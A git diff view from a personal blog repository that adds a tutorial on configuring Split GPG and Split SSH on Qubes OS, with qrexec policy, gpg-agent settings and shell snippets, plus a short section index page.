Instead, I highly recommend that you [create a minimal Mirage FirewallVM](/posts/os/firewalling-with-mirageos-on-qubes-os/) and use it as a firewall **behind** the Mullvad ProxyVM. Other AppVMs then should use the Mirage Firewall as the net qube instead. This way, you can make sure that firewall rules are properly enforced.
|
||||
|
||||

|
|
@ -0,0 +1,86 @@
|
|||
---
|
||||
title: "Using Split GPG and Split SSH on Qubes OS"
|
||||
date: 2022-08-13
|
||||
tags: ['Operating Systems', 'Qubes OS', 'Security']
|
||||
author: Tommy
|
||||
---
|
||||
|
||||

|
||||
|
||||
This post will go over setting up Split GPG, then setting up Split SSH with the same PGP keys. Effectively, we are emulating what you can do with a PGP smartcard on Qubes OS.
|
||||
|
||||
## Split GPG
|
||||
|
||||
Follow the official Qubes OS [documentation](https://www.qubes-os.org/doc/split-gpg/) to set this up.
|
||||
|
||||
Note that if you already have a PGP key with a passphrase, you can remove it by installing `pinentry-gtk` to `vault`'s TemplateVM, then do `gpg2 --edit-key <key_id>` and `passwd` to set an empty passphrase. The default non-graphical pinentry will just make an infinite loop and will not allow you to set an empty passphrase.
|
||||
|
||||
## Split SSH
|
||||
|
||||
This part is based on the Qubes Community's [guide](https://github.com/Qubes-Community/Contents/blob/master/docs/configuration/split-ssh.md); however, I will deviate from it to use the PGP keys for SSH instead of generating a new key pair.
|
||||
|
||||
### In `dom0`
|
||||
|
||||
- Create `/etc/qubes-rpc/policy/qubes.SshAgent` with `@anyvm @anyvm ask,default_target=vault` as the content. Since the keys ar not passphrase protected, you should **not** set the policy to allow.
|
||||
|
||||
### In `vault` AppVM
|
||||
- Add `enable-ssh-support` to the end of `~/.gnupg/gpg-agent.conf`
|
||||
- Get your keygrip with `gpg --with-keygrip -k`
|
||||
- Add your keygrip to the end of `~/.gnupg/sshconrol`
|
||||
|
||||

|
||||
|
||||
### In `vault`'s TemplateVM
|
||||
|
||||
- Create `/etc/qubes-rpc/qubes.SshAgent` with the following content:
|
||||
```bash
|
||||
#!/bin/sh
|
||||
# Qubes App Split SSH Script
|
||||
|
||||
# Activate GPG Agent and set the correct SSH socket
|
||||
export SSH_AUTH_SOCK=$(gpgconf --list-dirs agent-ssh-socket)
|
||||
gpgconf --launch gpg-agent
|
||||
|
||||
# safeguard - Qubes notification bubble for each ssh request
|
||||
notify-send "[$(qubesdb-read /name)] SSH agent access from: $QREXEC_REMOTE_DOMAIN"
|
||||
|
||||
# SSH connection
|
||||
socat - "UNIX-CONNECT:$SSH_AUTH_SOCK"
|
||||
|
||||
```
|
||||
|
||||
- Make it executable with `sudo chmod +x /etc/qubes-rpc/qubes.SshAgent`
|
||||
- Turn off the templateVM. If the `vault` VM is running, turn it off, then start it to update the VM's configuration.
|
||||
|
||||
### In `ssh-client` AppVM
|
||||
|
||||
- Add the following to the end of `/rw/config/rc.local`:
|
||||
```bash
|
||||
# SPLIT SSH CONFIGURATION >>>
|
||||
# replace "vault" with your AppVM name which stores the ssh private key(s)
|
||||
SSH_VAULT_VM="vault"
|
||||
|
||||
if [ "$SSH_VAULT_VM" != "" ]; then
|
||||
export SSH_SOCK="/home/user/.SSH_AGENT_$SSH_VAULT_VM"
|
||||
rm -f "$SSH_SOCK"
|
||||
sudo -u user /bin/sh -c "umask 177 && exec socat 'UNIX-LISTEN:$SSH_SOCK,fork' 'EXEC:qrexec-client-vm $SSH_VAULT_VM qubes.SshAgent'" &
|
||||
fi
|
||||
# <<< SPLIT SSH CONFIGURATION
|
||||
```
|
||||
|
||||
- Add the following to the end of `~/bash.rc`:
|
||||
```bash
|
||||
# SPLIT SSH CONFIGURATION >>>
|
||||
# replace "vault" with your AppVM name which stores the ssh private key(s)
|
||||
SSH_VAULT_VM="vault"
|
||||
|
||||
if [ "$SSH_VAULT_VM" != "" ]; then
|
||||
export SSH_AUTH_SOCK="/home/user/.SSH_AGENT_$SSH_VAULT_VM"
|
||||
fi
|
||||
# <<< SPLIT SSH CONFIGURATION
|
||||
```
|
||||
|
||||
- Restart `ssh-client` and confirm if it's working with `ssh-add -L`.
|
||||
|
||||
### Limitations
|
||||
A malicious `ssh-client` AppVM can hold onto the ssh-agent connection for more than one use until it is shut down. While your private key is protected, a malicious actor with access to the AppVM can still abuse the ssh-agent to log into your servers.
|
7
content/posts/qubes/_index.md
Normal file
7
content/posts/qubes/_index.md
Normal file
|
@ -0,0 +1,7 @@
|
|||
---
|
||||
title: Qubes OS
|
||||
ShowReadingTime: false
|
||||
ShowWordCount: false
|
||||
---
|
||||
|
||||
A collection of posts about Qubes OS and related applications
|
Loading…
Add table
Add a link
Reference in a new issue